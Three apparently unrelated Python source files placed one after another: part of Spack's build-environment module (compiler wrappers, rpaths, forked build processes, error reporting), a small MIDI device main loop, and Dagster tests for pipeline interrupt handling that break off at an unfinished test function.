    env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)

    # Set environment variables if specified for
    # the given compiler
    compiler = pkg.compiler
    env.extend(spack.schema.environment.parse(compiler.environment))

    if compiler.extra_rpaths:
        extra_rpaths = ':'.join(compiler.extra_rpaths)
        env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)

    # Add bin directories from dependencies to the PATH for the build.
    for prefix in build_prefixes:
        for dirname in ['bin', 'bin64']:
            bin_dir = os.path.join(prefix, dirname)
            if os.path.isdir(bin_dir):
                env.prepend_path('PATH', bin_dir)

    # Add spack build environment path with compiler wrappers first in
    # the path. We add the compiler wrapper path, which includes default
    # wrappers (cc, c++, f77, f90), AND a subdirectory containing
    # compiler-specific symlinks. The latter ensures that builds that
    # are sensitive to the *name* of the compiler see the right name when
    # we're building with the wrappers.
    #
    # Conflicts on case-insensitive systems (like "CC" and "cc") are
    # handled by putting one in the <build_env_path>/case-insensitive
    # directory. Add that to the path too.
    env_paths = []
    compiler_specific = os.path.join(
        spack.paths.build_env_path, pkg.compiler.name)
    for item in [spack.paths.build_env_path, compiler_specific]:
        env_paths.append(item)
        ci = os.path.join(item, 'case-insensitive')
        if os.path.isdir(ci):
            env_paths.append(ci)

    for item in env_paths:
        env.prepend_path('PATH', item)
    env.set_path(SPACK_ENV_PATH, env_paths)

    # Working directory for the spack command itself, for debug logs.
    if spack.config.get('config:debug'):
        env.set(SPACK_DEBUG, 'TRUE')
        env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
        env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
        env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)

    # Find ccache binary and hand it to build environment
    if spack.config.get('config:ccache'):
        ccache = Executable('ccache')
        if not ccache:
            raise RuntimeError("No ccache binary found in PATH")
        env.set(SPACK_CCACHE_BINARY, ccache)

    # Add any pkgconfig directories to PKG_CONFIG_PATH
    for prefix in build_link_prefixes:
        for directory in ('lib', 'lib64', 'share'):
            pcdir = os.path.join(prefix, directory, 'pkgconfig')
            if os.path.isdir(pcdir):
                env.prepend_path('PKG_CONFIG_PATH', pcdir)

    return env
def _set_variables_for_single_module(pkg, module):
    """Populate ``module`` with build helpers for ``pkg``.

    Installs make/cmake/meson executables, compiler wrapper paths and
    shell-like convenience functions into the module's namespace. A marker
    attribute guards against doing this work more than once per module.
    """
    # Skip modules that have already been populated.
    marker = '_set_run_already_called'
    if getattr(module, marker, False):
        return

    # Parallelism: honor config:build_jobs (capped by the core count) unless
    # the package opted out of parallel builds.
    if pkg.parallel:
        jobs = spack.config.get('config:build_jobs', 16)
    else:
        jobs = 1
    jobs = min(jobs, multiprocessing.cpu_count())

    mod = module
    mod.make_jobs = jobs

    # TODO: make these build deps that can be installed if not found.
    mod.make = MakeExecutable('make', jobs)
    mod.gmake = MakeExecutable('gmake', jobs)
    mod.scons = MakeExecutable('scons', jobs)
    mod.ninja = MakeExecutable('ninja', jobs)

    # easy shortcut to os.environ
    mod.env = os.environ

    # Find the configure script in the archive path
    # Don't use which for this; we want to find it in the current dir.
    mod.configure = Executable('./configure')
    mod.meson = Executable('meson')
    mod.cmake = Executable('cmake')
    mod.ctest = MakeExecutable('ctest', jobs)

    # Standard CMake and Meson arguments
    mod.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
    mod.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)

    # Put spack compiler wrapper paths in module scope.
    link_dir = spack.paths.build_env_path
    for attr, lang in (('spack_cc', 'cc'), ('spack_cxx', 'cxx'),
                       ('spack_f77', 'f77'), ('spack_fc', 'fc')):
        setattr(mod, attr,
                os.path.join(link_dir, pkg.compiler.link_paths[lang]))

    # Emulate some shell commands for convenience
    mod.pwd = os.getcwd
    mod.cd = os.chdir
    mod.mkdir = os.mkdir
    mod.makedirs = os.makedirs
    mod.remove = os.remove
    mod.removedirs = os.removedirs
    mod.symlink = os.symlink

    mod.mkdirp = mkdirp
    mod.install = install
    mod.install_tree = install_tree
    mod.rmtree = shutil.rmtree
    mod.move = shutil.move

    # Useful directories within the prefix are encapsulated in
    # a Prefix object.
    mod.prefix = pkg.prefix

    # Platform-specific library suffix.
    mod.dso_suffix = dso_suffix

    def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
        # Default to the spack compiler wrapper unless overridden.
        compiler_path = kwargs.get('compiler', mod.spack_cc)
        compiler = Executable(compiler_path)

        return _static_to_shared_library(pkg.spec.architecture, compiler,
                                         static_lib, shared_lib, **kwargs)

    mod.static_to_shared_library = static_to_shared_library

    # Mark the module as populated so repeat calls return early.
    setattr(mod, marker, True)
def set_module_variables_for_package(pkg):
    """Populate the module scope of install() with some useful functions.
    This makes things easier for package writers.
    """
    # If a user makes their own package repo, e.g.
    # spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
    # like spack.pkg.original.libelf.Libelf, then set the module variables
    # for both classes so the parent class can still use them if it gets
    # called. parent_class_modules includes pkg.module.
    for mod in parent_class_modules(pkg.__class__):
        _set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
                              **kwargs):
    """
    Converts a static library to a shared library. The static library has to
    be built with PIC for the conversion to work.

    Parameters:
        arch: architecture of the target spec; selects the platform-specific
            linker flags below (ELF soname vs. Mach-O install_name).
        compiler (Executable): compiler executable used to perform the link.
        static_lib (str): Path to the static library.
        shared_lib (str): Path to the shared library. Default is to derive
                          from the static library's path.

    Keyword arguments:
        compiler (str): Path to the compiler. Default is spack_cc.
        compiler_output: Where to print compiler output to.
        arguments (str list): Additional arguments for the compiler.
        version (str): Library version. Default is unspecified.
        compat_version (str): Library compatibility version. Default is
                              version.

    Returns:
        the compiler invocation's result (the link is executed eagerly).
    """
    compiler_output = kwargs.get('compiler_output', None)
    arguments = kwargs.get('arguments', [])
    version = kwargs.get('version', None)
    compat_version = kwargs.get('compat_version', version)

    # Default output name: same basename with the platform DSO suffix.
    if not shared_lib:
        shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
                                      dso_suffix)

    compiler_args = []

    # TODO: Compiler arguments should not be hardcoded but provided by
    # the different compiler classes.
    if 'linux' in arch or 'cray' in arch:
        # ELF platforms: embed an SONAME and pull the entire archive into
        # the shared object with --whole-archive.
        soname = os.path.basename(shared_lib)

        if compat_version:
            soname += '.{0}'.format(compat_version)

        compiler_args = [
            '-shared',
            '-Wl,-soname,{0}'.format(soname),
            '-Wl,--whole-archive',
            static_lib,
            '-Wl,--no-whole-archive'
        ]
    elif 'darwin' in arch:
        # Mach-O: use -install_name and force-load the static archive.
        install_name = shared_lib

        if compat_version:
            install_name += '.{0}'.format(compat_version)

        compiler_args = [
            '-dynamiclib',
            '-install_name', '{0}'.format(install_name),
            '-Wl,-force_load,{0}'.format(static_lib)
        ]

        if compat_version:
            compiler_args.extend(['-compatibility_version', '{0}'.format(
                compat_version)])

        if version:
            compiler_args.extend(['-current_version', '{0}'.format(version)])

    if len(arguments) > 0:
        compiler_args.extend(arguments)

    # The real output file carries the most specific version suffix.
    shared_lib_base = shared_lib

    if version:
        shared_lib += '.{0}'.format(version)
    elif compat_version:
        shared_lib += '.{0}'.format(compat_version)

    compiler_args.extend(['-o', shared_lib])

    # Create symlinks for version and compat_version
    # NOTE(review): the links are created before the compiler runs, and
    # os.symlink raises FileExistsError if they already exist — confirm
    # callers invoke this at most once per library.
    shared_lib_link = os.path.basename(shared_lib)

    if version or compat_version:
        os.symlink(shared_lib_link, shared_lib_base)

    if compat_version and compat_version != version:
        os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
                                                     compat_version))

    return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
    """Return immediate or transitive RPATH dependencies of ``pkg``.

    If the package requests transitive rpaths, all link-type dependencies
    in the spec DAG are returned; otherwise only direct link dependencies.
    """
    if pkg.transitive_rpaths:
        # Was deptype=('link') — parenthesized string, not a tuple. Use an
        # explicit one-element tuple and list() instead of a copy-comprehension.
        return list(pkg.spec.traverse(root=False, deptype=('link',)))
    return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
    """Get a list of all the rpaths for a package."""
    deps = get_rpath_deps(pkg)

    # The package's own lib dirs come first, then every dependency's ``lib``
    # dir, then every dependency's ``lib64`` dir (existing dirs only).
    rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
    for attr in ('lib', 'lib64'):
        rpaths.extend(getattr(dep.prefix, attr) for dep in deps
                      if os.path.isdir(getattr(dep.prefix, attr)))

    # Second module is our compiler mod name. We use that to get rpaths from
    # module show output.
    modules = pkg.compiler.modules
    if modules and len(modules) > 1:
        rpaths.append(path_from_modules([modules[1]]))

    return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
    """List of standard arguments used if a package is a CMakePackage.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list of str: standard arguments that would be used if this
        package were a CMakePackage instance.
    """
    return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
    """List of standard arguments used if a package is a MesonPackage.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list of str: standard arguments that would be used if this
        package were a MesonPackage instance.
    """
    return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
    """Get list of superclass modules that descend from
    spack.package.PackageBase. Includes cls.__module__.
    """
    # Stop once we are outside the PackageBase hierarchy (or at PackageBase
    # itself, which issubclass(PackageBase, cls) detects).
    if (not issubclass(cls, spack.package.PackageBase) or
            issubclass(spack.package.PackageBase, cls)):
        return []

    module = sys.modules.get(cls.__module__)
    result = [module] if module else []

    # Recurse into every base class and collect their modules as well.
    for base in cls.__bases__:
        result.extend(parent_class_modules(base))

    return result
def load_external_modules(pkg):
    """Traverse a package's spec DAG and load any external modules.

    Traverse a package's dependencies and load any external modules
    associated with them.

    Args:
        pkg (PackageBase): package to load deps for
    """
    # traverse() is a generator; iterating it directly avoids materializing
    # a throwaway list (the original wrapped it in list() unnecessarily).
    for dep in pkg.spec.traverse():
        for external_module in (dep.external_modules or []):
            load_module(external_module)
def setup_package(pkg, dirty, context='build'):
    """Execute all environment setup routines.

    Args:
        pkg (PackageBase): package whose environment is being set up
        dirty (bool): if True, do NOT clean the caller's environment first
        context (str): 'build' or 'test'; selects which setup hooks run
    """
    env = EnvironmentModifications()

    # clean environment
    if not dirty:
        clean_environment()

    # setup compilers and build tools for build contexts
    need_compiler = context == 'build' or (context == 'test' and
                                           pkg.test_requires_compiler)
    if need_compiler:
        set_compiler_environment_variables(pkg, env)
        set_build_environment_variables(pkg, env, dirty)

    # architecture specific setup
    pkg.architecture.platform.setup_platform_environment(pkg, env)

    if context == 'build':
        # recursive post-order dependency information
        env.extend(
            modifications_from_dependencies(pkg.spec, context=context)
        )

        if (not dirty) and (not env.is_unset('CPATH')):
            tty.debug("A dependency has updated CPATH, this may lead pkg-config"
                      " to assume that the package is part of the system"
                      " includes and omit it when invoked with '--cflags'.")

        # setup package itself
        set_module_variables_for_package(pkg)
        pkg.setup_build_environment(env)
    elif context == 'test':
        # Test context: expose the spec's run-time environment and make the
        # current directory searchable for test scripts.
        import spack.user_environment as uenv  # avoid circular import
        env.extend(uenv.environment_modifications_for_spec(pkg.spec))
        set_module_variables_for_package(pkg)
        env.prepend_path('PATH', '.')

    # Loading modules, in particular if they are meant to be used outside
    # of Spack, can change environment variables that are relevant to the
    # build of packages. To avoid a polluted environment, preserve the
    # value of a few, selected, environment variables
    # With the current ordering of environment modifications, this is strictly
    # unnecessary. Modules affecting these variables will be overwritten anyway
    with preserve_environment('CC', 'CXX', 'FC', 'F77'):
        # All module loads that otherwise would belong in previous
        # functions have to occur after the env object has its
        # modifications applied. Otherwise the environment modifications
        # could undo module changes, such as unsetting LD_LIBRARY_PATH
        # after a module changes it.
        if need_compiler:
            for mod in pkg.compiler.modules:
                # Fixes issue https://github.com/spack/spack/issues/3153
                if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
                    load_module("cce")
                load_module(mod)

        # kludge to handle cray libsci being automatically loaded by PrgEnv
        # modules on cray platform. Module unload does no damage when
        # unnecessary
        module('unload', 'cray-libsci')

        if pkg.architecture.target.module_name:
            load_module(pkg.architecture.target.module_name)

        load_external_modules(pkg)

    # Tell the compiler wrappers about implicit rpaths the compiler adds.
    implicit_rpaths = pkg.compiler.implicit_rpaths()
    if implicit_rpaths:
        env.set('SPACK_COMPILER_IMPLICIT_RPATHS',
                ':'.join(implicit_rpaths))

    # Make sure nothing's strange about the Spack environment.
    validate(env, tty.warn)
    env.apply_modifications()
def modifications_from_dependencies(spec, context):
    """Returns the environment modifications that are required by
    the dependencies of a spec and also applies modifications
    to this spec's package at module scope, if need be.

    Args:
        spec (Spec): spec for which we want the modifications
        context (str): either 'build' for build-time modifications or 'run'
            for run-time modifications
    """
    env = EnvironmentModifications()
    pkg = spec.package

    # Maps the context to deptype and method to be called
    deptype_and_method = {
        'build': (('build', 'link', 'test'),
                  'setup_dependent_build_environment'),
        'run': (('link', 'run'), 'setup_dependent_run_environment'),
        'test': (('link', 'run', 'test'), 'setup_dependent_run_environment')
    }
    deptype, method = deptype_and_method[context]

    # Post-order traversal: deeper dependencies contribute first.
    for dspec in spec.traverse(order='post', root=False, deptype=deptype):
        dpkg = dspec.package
        set_module_variables_for_package(dpkg)
        # Allow dependencies to modify the module
        dpkg.setup_dependent_package(pkg.module, spec)
        # NOTE(review): the root ``spec`` (not ``dspec``) is passed to the
        # setup hook here — confirm this matches the hook's expected contract.
        getattr(dpkg, method)(env, spec)
    return env
def fork(pkg, function, dirty, fake, context='build', **kwargs):
    """Fork a child process to do part of a spack build.

    Args:
        pkg (PackageBase): package whose environment we should set up the
            forked process for.
        function (callable): argless function to run in the child
            process.
        dirty (bool): If True, do NOT clean the environment before
            building.
        fake (bool): If True, skip package setup b/c it's not a real build
        context (string): If 'build', setup build environment. If 'test', setup
            test environment.

    Usage::

        def child_fun():
            # do stuff
        build_env.fork(pkg, child_fun)

    Forked processes are run with the build environment set up by
    spack.build_environment. This allows package authors to have full
    control over the environment, etc. without affecting other builds
    that might be executed in the same spack call.

    If something goes wrong, the child process catches the error and
    passes it to the parent wrapped in a ChildError. The parent is
    expected to handle (or re-raise) the ChildError.
    """

    def child_process(child_pipe, input_stream):
        # We are in the child process. Python sets sys.stdin to
        # open(os.devnull) to prevent our process and its parent from
        # simultaneously reading from the original stdin. But, we assume
        # that the parent process is not going to read from it till we
        # are done with the child, so we undo Python's precaution.
        if input_stream is not None:
            sys.stdin = input_stream

        try:
            if not fake:
                setup_package(pkg, dirty=dirty, context=context)
            return_value = function()
            # Success: ship the function's return value back to the parent.
            child_pipe.send(return_value)
        except StopPhase as e:
            # Do not create a full ChildError from this, it's not an error
            # it's a control statement.
            child_pipe.send(e)
        except BaseException:
            # catch ANYTHING that goes wrong in the child process
            exc_type, exc, tb = sys.exc_info()

            # Need to unwind the traceback in the child because traceback
            # objects can't be sent to the parent.
            tb_string = traceback.format_exc()

            # build up some context from the offending package so we can
            # show that, too.
            if exc_type is not spack.install_test.TestFailure:
                package_context = get_package_context(traceback.extract_tb(tb))
            else:
                package_context = []

            build_log = None
            if context == 'build' and hasattr(pkg, 'log_path'):
                build_log = pkg.log_path

            test_log = None
            if context == 'test':
                test_log = os.path.join(
                    pkg.test_suite.stage,
                    spack.install_test.TestSuite.test_log_name(pkg.spec))

            # make a pickleable exception to send to parent.
            msg = "%s: %s" % (exc_type.__name__, str(exc))

            ce = ChildError(msg,
                            exc_type.__module__,
                            exc_type.__name__,
                            tb_string, package_context,
                            build_log, test_log)
            child_pipe.send(ce)
        finally:
            # Always close our end so the parent's recv() cannot hang.
            child_pipe.close()

    parent_pipe, child_pipe = multiprocessing.Pipe()
    input_stream = None
    try:
        # Forward sys.stdin when appropriate, to allow toggling verbosity
        if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
            input_stream = os.fdopen(os.dup(sys.stdin.fileno()))

        p = multiprocessing.Process(
            target=child_process, args=(child_pipe, input_stream))
        p.start()

    except InstallError as e:
        # let the caller know which package went wrong.
        e.pkg = pkg
        raise

    finally:
        # Close the input stream in the parent process
        if input_stream is not None:
            input_stream.close()

    # Block until the child sends its result (return value, StopPhase,
    # or ChildError), then reap the process.
    child_result = parent_pipe.recv()
    p.join()

    # If returns a StopPhase, raise it
    if isinstance(child_result, StopPhase):
        # do not print
        raise child_result

    # let the caller know which package went wrong.
    if isinstance(child_result, InstallError):
        child_result.pkg = pkg

    if isinstance(child_result, ChildError):
        # If the child process raised an error, print its output here rather
        # than waiting until the call to SpackError.die() in main(). This
        # allows exception handling output to be logged from within Spack.
        # see spack.main.SpackCommand.
        child_result.print_context()
        raise child_result

    return child_result
def get_package_context(traceback, context=3):
    """Return some context for an error message when the build fails.

    Args:
        traceback (list of tuples): output from traceback.extract_tb() or
            traceback.extract_stack()
        context (int): Lines of context to show before and after the line
            where the error happened

    This function inspects the stack to find where we failed in the
    package file, and it adds detailed context to the long_message
    from there.
    """
    # Walk frames innermost-first, stopping at the deepest frame that lives
    # in a package.py or a build-system base class.
    for filename, lineno, function, text in reversed(traceback):
        if 'package.py' in filename or 'spack/build_systems' in filename:
            if function not in ('run_test', '_run_test_helper'):
                # We are in a package and not one of the listed methods
                # We exclude these methods because we expect errors in them to
                # be the result of user tests failing, and we show the tests
                # instead.
                break

    # Package files have a line added at import time, so we adjust the lineno
    # when we are getting context from a package file instead of a base class
    adjust = 1 if spack.paths.is_package_file(filename) else 0
    lineno = lineno - adjust

    # We found obj, the Package implementation we care about.
    # Point out the location in the install method where we failed.
    lines = [
        '{0}:{1:d}, in {2}:'.format(
            filename,
            lineno,
            function
        )
    ]

    # Build a message showing context in the install method.
    # Adjust for import mangling of package files.
    with open(filename, 'r') as f:
        sourcelines = f.readlines()

    # Slice out the window of source lines around the failing line.
    start = max(0, lineno - context - 1)
    sourcelines = sourcelines[start:lineno + context + 1]

    for i, line in enumerate(sourcelines):
        i = i + adjust  # adjusting for import munging again
        is_error = start + i == lineno
        mark = '>> ' if is_error else ' '
        # Add start to get lineno relative to start of file, not function.
        marked = ' {0}{1:-6d}{2}'.format(
            mark, start + i, line.rstrip())
        if is_error:
            # Highlight the offending line in red.
            marked = colorize('@R{%s}' % cescape(marked))
        lines.append(marked)

    return lines
class InstallError(spack.error.SpackError):
    """Raised by packages when a package fails to install.

    Any subclass of InstallError will be annotated by Spack with a
    ``pkg`` attribute on failure, which the caller can use to get the
    package for which the exception was raised.
    """
class ChildError(InstallError):
    """Special exception class for wrapping exceptions from child processes
    in Spack's build environment.

    The main features of a ChildError are:

    1. They're serializable, so when a child build fails, we can send one
       of these to the parent and let the parent report what happened.

    2. They have a ``traceback`` field containing a traceback generated
       on the child immediately after failure. Spack will print this on
       failure in lieu of trying to run sys.excepthook on the parent
       process, so users will see the correct stack trace from a child.

    3. They also contain context, which shows context in the Package
       implementation where the error happened. This helps people debug
       Python code in their packages. To get it, Spack searches the
       stack trace for the deepest frame where ``self`` is in scope and
       is an instance of PackageBase. This will generally find a useful
       spot in the ``package.py`` file.

    The long_message of a ChildError displays one of two things:

    1. If the original error was a ProcessError, indicating a command
       died during the build, we'll show context from the build log.

    2. If the original error was any other type of error, we'll show
       context from the Python code.

    SpackError handles displaying the special traceback if we're in debug
    mode with spack -d.
    """
    # List of errors considered "build errors", for which we'll show log
    # context instead of Python context.
    build_errors = [('spack.util.executable', 'ProcessError')]

    def __init__(self, msg, module, classname, traceback_string, context,
                 build_log, test_log):
        super(ChildError, self).__init__(msg)
        self.module = module
        self.name = classname
        self.traceback = traceback_string
        self.context = context
        self.build_log = build_log
        self.test_log = test_log

    @property
    def long_message(self):
        # Assemble the detailed message lazily, each time it is requested.
        out = StringIO()
        out.write(self._long_message if self._long_message else '')

        if (self.module, self.name) in ChildError.build_errors:
            # The error happened in some external executed process. Show
            # the log with errors or warnings highlighted.
            if self.build_log and os.path.exists(self.build_log):
                write_log_summary(out, 'build', self.build_log)

            if self.test_log and os.path.exists(self.test_log):
                write_log_summary(out, 'test', self.test_log)

        else:
            # The error happened in the Python code, so try to show
            # some context from the Package itself.
            if self.context:
                out.write('\n')
                out.write('\n'.join(self.context))
                out.write('\n')

        if out.getvalue():
            out.write('\n')

        # Always point the user at the full logs when they exist.
        if self.build_log and os.path.exists(self.build_log):
            out.write('See build log for details:\n')
            out.write(' %s\n' % self.build_log)

        if self.test_log and os.path.exists(self.test_log):
            out.write('See test log for details:\n')
            out.write(' %s\n' % self.test_log)

        return out.getvalue()

    def __str__(self):
        return self.message + self.long_message + self.traceback

    def __reduce__(self):
        """__reduce__ is used to serialize (pickle) ChildErrors.

        Return a function to reconstruct a ChildError, along with the
        salient properties we'll need.
        """
        return _make_child_error, (
            self.message,
            self.module,
            self.name,
            self.traceback,
            self.context,
            self.build_log,
            self.test_log)
def _make_child_error(msg, module, name, traceback, context,
                      build_log, test_log):
    """Used by __reduce__ in ChildError to reconstruct pickled errors."""
    args = (msg, module, name, traceback, context, build_log, test_log)
    return ChildError(*args)
class StopPhase(spack.error.SpackError):
    """Pickle-able exception to control stopped builds."""

    def __reduce__(self):
        # Serialize via a module-level factory so instances survive the
        # multiprocessing pipe between child and parent.
        return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
    """Rebuild a StopPhase while unpickling (see StopPhase.__reduce__)."""
    return StopPhase(msg, long_msg)
def write_log_summary(out, log_type, log, last=None):
    """Write a summary of log events (errors, else warnings) to ``out``.

    Args:
        out: file-like object the summary is written to
        log_type (str): label for the log ('build' or 'test')
        log (str): path of the log file to parse
        last (int): if set, only the last ``last`` events are shown
    """
    errors, warnings = parse_log_events(log)

    def _emit(events, label):
        # Trim to the most recent events when a limit is given.
        count = len(events)
        if last and count > last:
            events = events[-last:]
            count = last
        out.write(
            "\n%s found in %s log:\n" %
            (plural(count, label), log_type))
        out.write(make_log_context(events))

    if errors:
        # If errors are found, only display errors
        _emit(errors, 'error')
    elif warnings:
        # If no errors are found but warnings are, display warnings
        _emit(warnings, 'warning')
|
midi_pi.py | import cProfile
import pstats
import sys
import time
from threading import Thread
from config import Config
from display import Display
from i2c import I2C
from leds import Leds
from midi_ports import MidiPorts
from music import Music
from power import Power
from server import Server
from util import niceTime, updatePendingActions
class MidiPi:
    """Top-level application object: initializes all subsystems and drives
    the per-iteration update loop."""

    def __init__(self):
        # Config is loaded first — presumably so the other subsystems can
        # read it during their init (confirm against the subsystem modules).
        Config.load()
        Music.init()
        Leds.init()
        I2C.init()
        Power.init()
        self.Display = Display()
        # The web server runs on a daemon thread so it dies with the
        # main thread instead of keeping the process alive.
        self.serverThread = Thread(target=Server.init)
        self.serverThread.daemon = True
        self.serverThread.start()
        print('Init Complete')

    def update(self):
        """Run one iteration of the main loop: poll inputs, refresh outputs."""
        MidiPorts.update()
        Config.update()
        Leds.updateLeds()
        Music.update()
        self.Display.update()
        updatePendingActions(self.Display)

    def profile(self):
        """Profile 300 update() iterations and print the stats."""
        profile = cProfile.Profile()
        profile.enable()
        i = 0
        while i < 300:
            self.update()
            i += 1
        profile.disable()
        ps = pstats.Stats(profile)
        ps.print_stats()
if __name__ == "__main__":
    try:
        print(niceTime() + ': Entering main loop. Press Control-C to exit.')
        midiPi = MidiPi()
        while True:
            if Config.PROFILING:
                midiPi.profile()
                break
            midiPi.update()
            # time.sleep(0.0005)
    except KeyboardInterrupt:
        # Control-C is the documented, normal exit path — no traceback needed.
        pass
    except Exception:
        # Was a bare ``except:`` that silently swallowed every error;
        # report unexpected failures before cleaning up.
        print(sys.exc_info())
    finally:
        # Always release MIDI ports and stop the server thread's loop.
        MidiPorts.cleanup()
        Server.running = False
        print('Exit')
test_interrupt.py | import os
import signal
import tempfile
import time
from threading import Thread
import pytest
from dagster import (
DagsterEventType,
Field,
ModeDefinition,
String,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
seven,
solid,
)
from dagster.core.errors import DagsterExecutionInterruptedError, raise_execution_interrupts
from dagster.core.test_utils import default_mode_def_for_test, instance_for_test
from dagster.utils import safe_tempfile_path, send_interrupt
from dagster.utils.interrupts import capture_interrupts, check_captured_interrupt
def _send_kbd_int(temp_files):
    """Block until every file in ``temp_files`` exists, then interrupt."""
    while not all(os.path.exists(path) for path in temp_files):
        time.sleep(0.1)
    send_interrupt()
@solid(config_schema={"tempfile": Field(String)})
def write_a_file(context):
    # Signal the watcher thread by creating the configured file, then spin
    # until an interrupt arrives — or give up after 30 seconds.
    with open(context.solid_config["tempfile"], "w") as ff:
        ff.write("yup")

    deadline = time.time() + 30
    while time.time() < deadline:
        time.sleep(0.1)

    raise Exception("Timed out")
@solid
def should_not_start(_context):
    # Sentinel solid: the interrupt must cancel the run before this executes.
    assert False
@pipeline(mode_defs=[default_mode_def_for_test])
def write_files_pipeline():
    # Four slow file-writing solids plus three sentinels that must never run.
    write_a_file.alias("write_1")()
    write_a_file.alias("write_2")()
    write_a_file.alias("write_3")()
    write_a_file.alias("write_4")()
    should_not_start.alias("x_should_not_start")()
    should_not_start.alias("y_should_not_start")()
    should_not_start.alias("z_should_not_start")()
def test_single_proc_interrupt():
    """An interrupt mid-run surfaces as step + pipeline failure events."""

    @pipeline
    def write_a_file_pipeline():
        write_a_file()

    with safe_tempfile_path() as success_tempfile:
        # launch a thread that waits until the file is written to launch an interrupt
        Thread(target=_send_kbd_int, args=([success_tempfile],)).start()

        result_types = []
        result_messages = []

        # next time the launched thread wakes up it will send a keyboard
        # interrupt
        for result in execute_pipeline_iterator(
            write_a_file_pipeline,
            run_config={"solids": {"write_a_file": {"config": {"tempfile": success_tempfile}}}},
        ):
            result_types.append(result.event_type)
            result_messages.append(result.message)

        assert DagsterEventType.STEP_FAILURE in result_types
        assert DagsterEventType.PIPELINE_FAILURE in result_types

        # The failure must be reported as an unexpected interruption.
        assert any(
            [
                "Execution was interrupted unexpectedly. "
                "No user initiated termination request was found, treating as failure." in message
                for message in result_messages
            ]
        )
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_interrupt_multiproc():
    """Interrupting a multiprocess run fails all four in-flight steps."""
    with tempfile.TemporaryDirectory() as tempdir:
        with instance_for_test(temp_dir=tempdir) as instance:
            file_1 = os.path.join(tempdir, "file_1")
            file_2 = os.path.join(tempdir, "file_2")
            file_3 = os.path.join(tempdir, "file_3")
            file_4 = os.path.join(tempdir, "file_4")

            # launch a thread that waits until the file is written to launch an interrupt
            Thread(target=_send_kbd_int, args=([file_1, file_2, file_3, file_4],)).start()

            results = []

            # launch a pipeline that writes a file and loops infinitely
            # next time the launched thread wakes up it will send a keyboard
            # interrupt
            for result in execute_pipeline_iterator(
                reconstructable(write_files_pipeline),
                run_config={
                    "solids": {
                        "write_1": {"config": {"tempfile": file_1}},
                        "write_2": {"config": {"tempfile": file_2}},
                        "write_3": {"config": {"tempfile": file_3}},
                        "write_4": {"config": {"tempfile": file_4}},
                    },
                    "execution": {"multiprocess": {"config": {"max_concurrent": 4}}},
                },
                instance=instance,
            ):
                results.append(result)

            # All four running write solids fail; the sentinels never start.
            assert [result.event_type for result in results].count(
                DagsterEventType.STEP_FAILURE
            ) == 4
            assert DagsterEventType.PIPELINE_FAILURE in [result.event_type for result in results]
def test_interrupt_resource_teardown():
    """Resource finalizers still run when a run is interrupted."""
    called = []
    cleaned = []

    @resource
    def resource_a(_):
        try:
            called.append("A")
            yield "A"
        finally:
            # Teardown must execute even on interruption.
            cleaned.append("A")

    @solid(config_schema={"tempfile": Field(String)}, required_resource_keys={"a"})
    def write_a_file_resource_solid(context):
        with open(context.solid_config["tempfile"], "w") as ff:
            ff.write("yup")
        while True:
            time.sleep(0.1)

    @pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
    def write_a_file_pipeline():
        write_a_file_resource_solid()

    with safe_tempfile_path() as success_tempfile:
        # launch a thread that waits until the file is written to launch an interrupt
        Thread(target=_send_kbd_int, args=([success_tempfile],)).start()

        results = []

        # launch a pipeline that writes a file and loops infinitely
        # next time the launched thread wakes up it will send an interrupt
        for result in execute_pipeline_iterator(
            write_a_file_pipeline,
            run_config={
                "solids": {
                    "write_a_file_resource_solid": {"config": {"tempfile": success_tempfile}}
                }
            },
        ):
            results.append(result.event_type)

        assert DagsterEventType.STEP_FAILURE in results
        assert DagsterEventType.PIPELINE_FAILURE in results
        assert "A" in cleaned
def _send_interrupt_to_self():
    """SIGINT our own process and wait until the interrupt is captured."""
    os.kill(os.getpid(), signal.SIGINT)
    deadline = time.time() + 15
    while not check_captured_interrupt():
        time.sleep(1)
        if time.time() > deadline:
            raise Exception("Timed out waiting for interrupt to be received")
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_capture_interrupt():
    """Inside capture_interrupts() a SIGINT is swallowed; outside it raises."""
    outer_interrupt = False
    inner_interrupt = False

    with capture_interrupts():
        try:
            _send_interrupt_to_self()
        except:  # pylint: disable=bare-except
            inner_interrupt = True

    # The captured interrupt must not surface inside the context manager.
    assert not inner_interrupt

    # Verify standard interrupt handler is restored
    standard_interrupt = False

    try:
        _send_interrupt_to_self()
    except KeyboardInterrupt:
        standard_interrupt = True

    assert standard_interrupt

    outer_interrupt = False
    inner_interrupt = False

    # No exception if no signal thrown
    try:
        with capture_interrupts():
            try:
                time.sleep(5)
            except:  # pylint: disable=bare-except
                inner_interrupt = True
    except:  # pylint: disable=bare-except
        outer_interrupt = True

    assert not outer_interrupt
    assert not inner_interrupt
@pytest.mark.skipif(seven.IS_WINDOWS, reason="Interrupts handled differently on windows")
def test_raise_execution_interrupts():
